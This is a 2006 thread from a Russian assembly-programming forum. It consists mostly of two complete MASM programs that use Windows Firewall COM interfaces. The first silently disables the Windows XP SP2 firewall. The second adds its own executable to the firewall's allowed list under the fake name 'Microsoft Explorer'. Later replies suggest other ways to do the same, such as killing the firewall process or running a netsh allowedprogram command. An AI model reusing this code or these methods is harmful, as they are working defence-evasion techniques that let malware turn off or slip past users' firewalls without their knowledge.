WinXPSP2Firewall Disabled

Тема в разделе "WASM.ENGLISH", создана пользователем Guest, 10 фев 2006.

  1. Guest

    Guest Guest

    Публикаций:
    0
    .586

    .model flat, stdcall

    option casemap :none



    include \masm32\include\windows.inc

    include \masm32\include\user32.inc

    include \masm32\include\kernel32.inc

    include \masm32\include\ole32.inc



    includelib \masm32\lib\ole32.lib

    includelib \masm32\lib\user32.lib

    includelib \masm32\lib\kernel32.lib

    include oaidl.inc



    PutProperty proto :dword, :dword, :dword

    GetProperty proto :dword, :dword, :dword





    unicode macro page,string,zero

    irpc c,<string>

    db '&c', page

    endm

    ifnb <zero>

    dw zero

    endif

    endm



    .data

    IID_NULL GUID <0, 0, 0, <0, 0, 0, 0, 0, 0, 0, 0>>

    CLSID_NetFwMgr GUID <0304CE942h, 06E39h, 040D8h, <094h, 03Ah, 0B9h, 013h, 0C4h, 00Ch, 09Ch, 0D4h>>

    IID_INetFwMgr GUID <0F7898AF5h, 0CAC4h, 04632h, <0A2h, 0ECh, 0DAh, 006h, 0E5h, 011h, 01Ah, 0F2h>>

    vVal VARIANT <>

    VarResult VARIANT <>

    fwMgr dd ?

    fwPolicy dd ?

    m_pFireWallProfile dd ?



    .code

    wszLocalPolicy:

    unicode 0, <LocalPolicy>,0

    wszCurrentProfile:

    unicode 0, <CurrentProfile>,0

    wszFirewallEnabled:

    unicode 0, <FirewallEnabled>,0

    start:

    invoke OleInitialize, 0

    invoke CoCreateInstance, addr CLSID_NetFwMgr, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwMgr, addr fwMgr

    invoke GetProperty, fwMgr, offset wszLocalPolicy, addr VarResult

    mov eax, VarResult.ppdispVal

    mov fwPolicy, eax

    invoke GetProperty, fwPolicy, offset wszCurrentProfile, addr VarResult

    mov eax, VarResult.ppdispVal

    mov fwPolicy, eax

    mov m_pFireWallProfile, eax

    mov vVal.vt, VT_BOOL

    mov vVal.boolVal, VARIANT_FALSE

    invoke PutProperty, m_pFireWallProfile, offset wszFirewallEnabled, addr vVal

    coinvoke m_pFireWallProfile, IDispatch, Release

    coinvoke fwPolicy, IDispatch, Release

    coinvoke fwMgr, IDispatch, Release

    invoke ExitProcess, 0



    ;###############################################################



    PutProperty proc _This:dword, pUniName:dword, pAgmnt:dword



    LOCAL pArm : DISPPARAMS

    LOCAL var_8 : dword

    LOCAL dispIdMember : dword



    mov eax, 80004003h

    .if _This != 0 && pAgmnt != 0

    mov var_8, 0FFFFFFFDh

    mov eax, pAgmnt

    mov pArm.rgvarg, eax

    lea eax, var_8

    mov pArm.rgdispidNamedArgs, eax

    mov pArm.cArgs, 1

    mov pArm.cNamedArgs, 1

    coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember

    .if eax == 0

    mov ecx, pAgmnt

    mov cx, (VARIANT ptr [ecx]).vt

    xor eax, eax

    .if cx == VT_UNKNOWN || cx == VT_DISPATCH || !(cx & VT_ARRAY) || !(cx & VT_BYREF)

    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, 0, 0, 0

    .endif

    .if eax != 0

    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUT, addr pArm, 0, 0, 0

    .endif

    .endif

    .endif

    ret



    PutProperty endp



    ;###############################################################



    GetProperty proc _This:dword, pUniName:dword, pOutArg:dword



    LOCAL dispIdMember : dword

    LOCAL pArm : DISPPARAMS



    mov pArm.rgvarg, 0

    mov pArm.rgdispidNamedArgs, 0

    mov pArm.cArgs, 0

    mov pArm.cNamedArgs, 0

    mov eax, 80004003h

    .if _This != 0

    coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember

    .if eax == 0

    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYGET, addr pArm, pOutArg, 0, 0

    .endif

    .endif

    ret



    GetProperty endp



    ;###############################################################



    end start
     
  2. Guest

    Guest Guest

    Публикаций:
    0
    WinXPSP2Firewall - вырубается гораздо меньшим кодом и без ком-объектов
     
  3. Guest

    Guest Guest

    Публикаций:
    0
    Покажи.
     
  4. Oleg_SK

    Oleg_SK Guest

    Публикаций:
    0
    Corleone

    Как говорится: пример в студию!:)
     
  5. Bill_Prisoner

    Bill_Prisoner New Member

    Публикаций:
    0
    Регистрация:
    4 май 2005
    Сообщения:
    238
    Обьясните на чем основан приведенный код?
     
  6. Guest

    Guest Guest

    Публикаций:
    0


    netfw.idl
     
  7. Bill_Prisoner

    Bill_Prisoner New Member

    Публикаций:
    0
    Регистрация:
    4 май 2005
    Сообщения:
    238


    Что это?
     
  8. Guest

    Guest Guest

    Публикаций:
    0
    The Interface Definition Language (IDL) File.



    An IDL file contains one or more interface definitions. Each interface definition is composed of an interface header and an interface body. The interface header is demarcated by square brackets. The interface body is contained in curly brackets. This is illustrated in the following example interface:
     
  9. Guest

    Guest Guest

    Публикаций:
    0
    Corleone



    "нимдеть - это не камушки ворочать"

    narodnaja mudrost
     
  10. Guest

    Guest Guest

    Публикаций:
    0
    Corleone



    Зделай без ком объектов вот это.

    Если WinXPSP2Firewall включен, то добавляет себя в список програм.



    ;------------------------------------------



    .586

    .model flat, stdcall

    option casemap :none



    include \masm32\include\windows.inc

    include \masm32\include\user32.inc

    include \masm32\include\kernel32.inc

    include \masm32\include\ole32.inc

    include \masm32\include\Oleaut32.inc



    includelib \masm32\lib\ole32.lib

    includelib \masm32\lib\user32.lib

    includelib \masm32\lib\kernel32.lib

    includelib \masm32\lib\Oleaut32.lib

    include oaidl.inc



    Initialize proto :dword

    Uninitialize proto :dword

    TurnOffWindowsFirewall proto

    TurnOnWindowsFirewall proto

    AddApplication proto :dword, :dword, :dword

    IsWindowsFirewallOn proto :dword, :dword

    PutProperty proto :dword, :dword, :dword

    GetProperty proto :dword, :dword, :dword

    CallMethod proto :dword, :dword, :dword, :dword, :dword





    unicode macro page,string,zero

    irpc c,<string>

    db '&c', page

    endm

    ifnb <zero>

    dw zero

    endif

    endm



    .data

    IID_NULL GUID <0, 0, 0, <0, 0, 0, 0, 0, 0, 0, 0>>

    CLSID_NetFwAuthorizedApplication GUID <0EC9846B3h, 02762h, 04A6Bh, <0A2h, 014h, 06Ah, 0CBh, 060h, 034h, 062h, 0D2h>>

    IID_INetFwAuthorizedApplication GUID <0B5E64FFAh, 0C2C5h, 0444Eh, <0A3h, 001h, 0FBh, 05Eh, 000h, 001h, 080h, 050h>>

    CLSID_NetFwMgr GUID <0304CE942h, 06E39h, 040D8h, <094h, 03Ah, 0B9h, 013h, 0C4h, 00Ch, 09Ch, 0D4h>>

    IID_INetFwMgr GUID <0F7898AF5h, 0CAC4h, 04632h, <0A2h, 0ECh, 0DAh, 006h, 0E5h, 011h, 01Ah, 0F2h>>

    .code

    wszLocalPolicy:

    unicode 0, <LocalPolicy>,0

    wszCurrentProfile:

    unicode 0, <CurrentProfile>,0

    wszFirewallEnabled:

    unicode 0, <FirewallEnabled>,0

    wszName:

    unicode 0, <Name>,0

    wszAdd:

    unicode 0, <Add>,0

    wszEnabled:

    unicode 0, <Enabled>,0

    wszAuthorizedApplications:

    unicode 0, <AuthorizedApplications>,0

    wszProcessImageFileName:

    unicode 0, <ProcessImageFileName>,0

    wszFireWallTest:

    unicode 0, <Microsoft Explorer>,0

    start:

    call WinFaerFix

    invoke ExitProcess, 0



    ;###############################################################



    WinFaerFix proc uses edi esi ebx



    LOCAL WfProfil : dword

    LOCAL wszMofd[500] : byte

    LOCAL bWfon : dword



    invoke OleInitialize, 0

    invoke Initialize, addr WfProfil

    .if eax == 0

    invoke IsWindowsFirewallOn, WfProfil, addr bWfon

    .if eax == 0 && bWfon == VARIANT_TRUE

    invoke GetModuleFileNameW, 0, addr wszMofd, 500

    invoke AddApplication, WfProfil, addr wszMofd, addr wszFireWallTest

    .endif

    invoke Uninitialize, WfProfil

    .endif

    ret



    WinFaerFix endp



    ;##########################################################



    IsWindowsFirewallOn proc uses edi esi ebx wfprf:dword, wfbol:dword



    LOCAL VarResult : VARIANT



    invoke GetProperty, wfprf, offset wszFirewallEnabled, addr VarResult

    .if eax == 0

    mov ecx, wfbol

    movzx edx, VarResult.boolVal

    mov [ecx], edx

    .endif

    ret



    IsWindowsFirewallOn endp



    ;##########################################################



    AddApplication proc uses edi esi ebx wfprf:dword, lpszProcessImageFileName:dword, lpszRegisterName:dword



    LOCAL bAppEnable : dword

    LOCAL VarResult : VARIANT

    LOCAL bstrProcFileName : dword

    LOCAL vVal : VARIANT

    LOCAL bstrRegisterName : dword

    LOCAL pFWApp : dword

    LOCAL pFWApps : dword

    LOCAL result : dword



    invoke GetProperty, wfprf, offset wszAuthorizedApplications, addr VarResult

    mov result, eax

    .if eax == 0

    mov eax, VarResult.ppdispVal

    mov pFWApps, eax

    invoke CoCreateInstance, addr CLSID_NetFwAuthorizedApplication, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwAuthorizedApplication, addr pFWApp

    mov result, eax

    .if eax == 0

    invoke SysAllocString, lpszProcessImageFileName

    mov bstrProcFileName, eax

    mov eax, bstrProcFileName

    mov vVal.vt, VT_BSTR

    mov vVal.pbstrVal, eax

    invoke PutProperty, pFWApp, offset wszProcessImageFileName, addr vVal

    mov result, eax

    .if eax == 0

    invoke SysAllocString, lpszRegisterName

    mov bstrRegisterName, eax

    mov eax, bstrRegisterName

    mov vVal.vt, VT_BSTR

    mov vVal.pbstrVal, eax

    invoke PutProperty, pFWApp, offset wszName, addr vVal

    mov result, eax

    .if eax == 0

    mov vVal.vt, VT_DISPATCH

    mov eax, pFWApp

    mov vVal.pdispVal, eax

    invoke CallMethod, pFWApps, offset wszAdd, addr VarResult, 1, addr vVal

    mov result, eax

    .endif

    invoke SysFreeString, bstrRegisterName

    .endif

    invoke SysFreeString, bstrProcFileName

    .if( pFWApp )

    coinvoke pFWApp, IDispatch, Release

    .endif

    .if( pFWApps )

    coinvoke pFWApps, IDispatch, Release

    .endif

    .endif

    .endif

    mov eax, result

    ret



    AddApplication endp



    ;##########################################################



    Uninitialize proc uses edi esi ebx wfprf:dword



    coinvoke wfprf, IDispatch, Release

    ret



    Uninitialize endp



    ;###############################################################



    Initialize proc uses edi esi ebx pwfprf:dword



    LOCAL fwPolicy : dword

    LOCAL fwMgr : dword

    LOCAL VarResult : VARIANT

    LOCAL result : dword



    invoke CoCreateInstance, addr CLSID_NetFwMgr, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwMgr, addr fwMgr

    mov result, eax

    .if eax == 0

    invoke GetProperty, fwMgr, offset wszLocalPolicy, addr VarResult

    mov result, eax

    .if eax == 0

    mov eax, VarResult.ppdispVal

    mov fwPolicy, eax

    invoke GetProperty, fwPolicy, offset wszCurrentProfile, addr VarResult

    mov result, eax

    .if eax == 0

    mov eax, VarResult.ppdispVal

    mov ecx, pwfprf

    mov [ecx], eax

    mov result, 0

    coinvoke fwPolicy, IDispatch, Release

    .endif

    .endif

    coinvoke fwMgr, IDispatch, Release

    .endif

    mov eax, result

    ret



    Initialize endp



    ;###############################################################



    PutProperty proc uses edi esi ebx _This:dword, pUniName:dword, pAgmnt:dword



    LOCAL pArm : DISPPARAMS

    LOCAL NamArg : dword

    LOCAL dispIdMember : dword



    mov eax, 80004003h

    .if _This != 0 && pAgmnt != 0

    mov NamArg, 0FFFFFFFDh

    mov eax, pAgmnt

    mov pArm.rgvarg, eax

    lea eax, NamArg

    mov pArm.rgdispidNamedArgs, eax

    mov pArm.cArgs, 1

    mov pArm.cNamedArgs, 1

    coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember

    .if eax == 0

    mov ecx, pAgmnt

    mov cx, (VARIANT ptr [ecx]).vt

    xor eax, eax

    .if cx == VT_UNKNOWN || cx == VT_DISPATCH || !(cx & VT_ARRAY) || !(cx & VT_BYREF)

    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, 0, 0, 0

    .endif

    .if eax != 0

    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUT, addr pArm, 0, 0, 0

    .endif

    .endif

    .endif

    ret



    PutProperty endp



    ;###############################################################



    GetProperty proc uses edi esi ebx _This:dword, pUniName:dword, pOutArg:dword



    LOCAL dispIdMember : dword

    LOCAL pArm : DISPPARAMS



    mov pArm.rgvarg, 0

    mov pArm.rgdispidNamedArgs, 0

    mov pArm.cArgs, 0

    mov pArm.cNamedArgs, 0

    mov eax, 80004003h

    .if _This != 0 && pOutArg != 0

    coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember

    .if eax == 0

    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYGET, addr pArm, pOutArg, 0, 0

    .endif

    .endif

    ret



    GetProperty endp



    ;###############################################################



    CallMethod proc uses edi esi ebx _This:dword, MetName:dword, VarRes:dword, numArg:dword, pArgArray:dword



    LOCAL pArm : DISPPARAMS

    LOCAL dispIdMember : dword



    mov eax, pArgArray

    mov pArm.rgvarg, eax

    mov eax, numArg

    mov pArm.cArgs, eax

    mov pArm.rgdispidNamedArgs, 0

    mov pArm.cNamedArgs, 0

    mov eax, 80004003h

    .if _This != 0 && VarRes != 0

    coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr MetName, 1, LOCALE_USER_DEFAULT, addr dispIdMember

    .if eax == 0

    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD, addr pArm, VarRes, 0, 0

    .if eax != 0

    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, VarRes, 0, 0

    .endif

    .endif

    .endif

    ret



    CallMethod endp



    ;##########################################################





    end start
     
  11. Guest

    Guest Guest

    Публикаций:
    0
    Аноним



    Я не пойму сложности вопроса отключения стандартного фаера. Пример приводить не буду, т.к. кое где сам юзаю, но лишь скажу что без проверок на ошибки в асме он занимает 5 строк, никаких ком-объектов, драйверов и манипуляций с памятью не проводится, смотрите проще!
     
  12. Guest

    Guest Guest

    Публикаций:
    0


    дело не в сложности, а в адекватности.



    На разговор - отвечаем разговором. На пример - примером.

    Если на пример отвечем разговором - это и есть "нимдеть - это не камушки ворочать".





    типа прибить процес это большой секрет
     
  13. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    Hey,Аноним

    ;---------------------------------------------------------

    IDispatch_ReleaseProto typedef proto

    IDispatch_Release typedef ptr IDispatch_ReleaseProto

    ;---------------------------------------------------------

    could it pass ML?
     
  14. Guest

    Guest Guest

    Публикаций:
    0
  15. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    OK!

    Thanks
     
  16. slow

    slow New Member

    Публикаций:
    0
    Регистрация:
    27 дек 2004
    Сообщения:
    615
    Аноним

    А зачем убивать WinFw? Вполне можно использовать

    netsh firewall add allowedprogram <program>
     
  17. Guest

    Guest Guest

    Публикаций:
    0
    У меня вооще XP нету:)
     
  18. slow

    slow New Member

    Публикаций:
    0
    Регистрация:
    27 дек 2004
    Сообщения:
    615
    Просто не надо возиться с COM, выполнил ShellExecute и всё

    У меня вооще XP нету:)

    завидую :))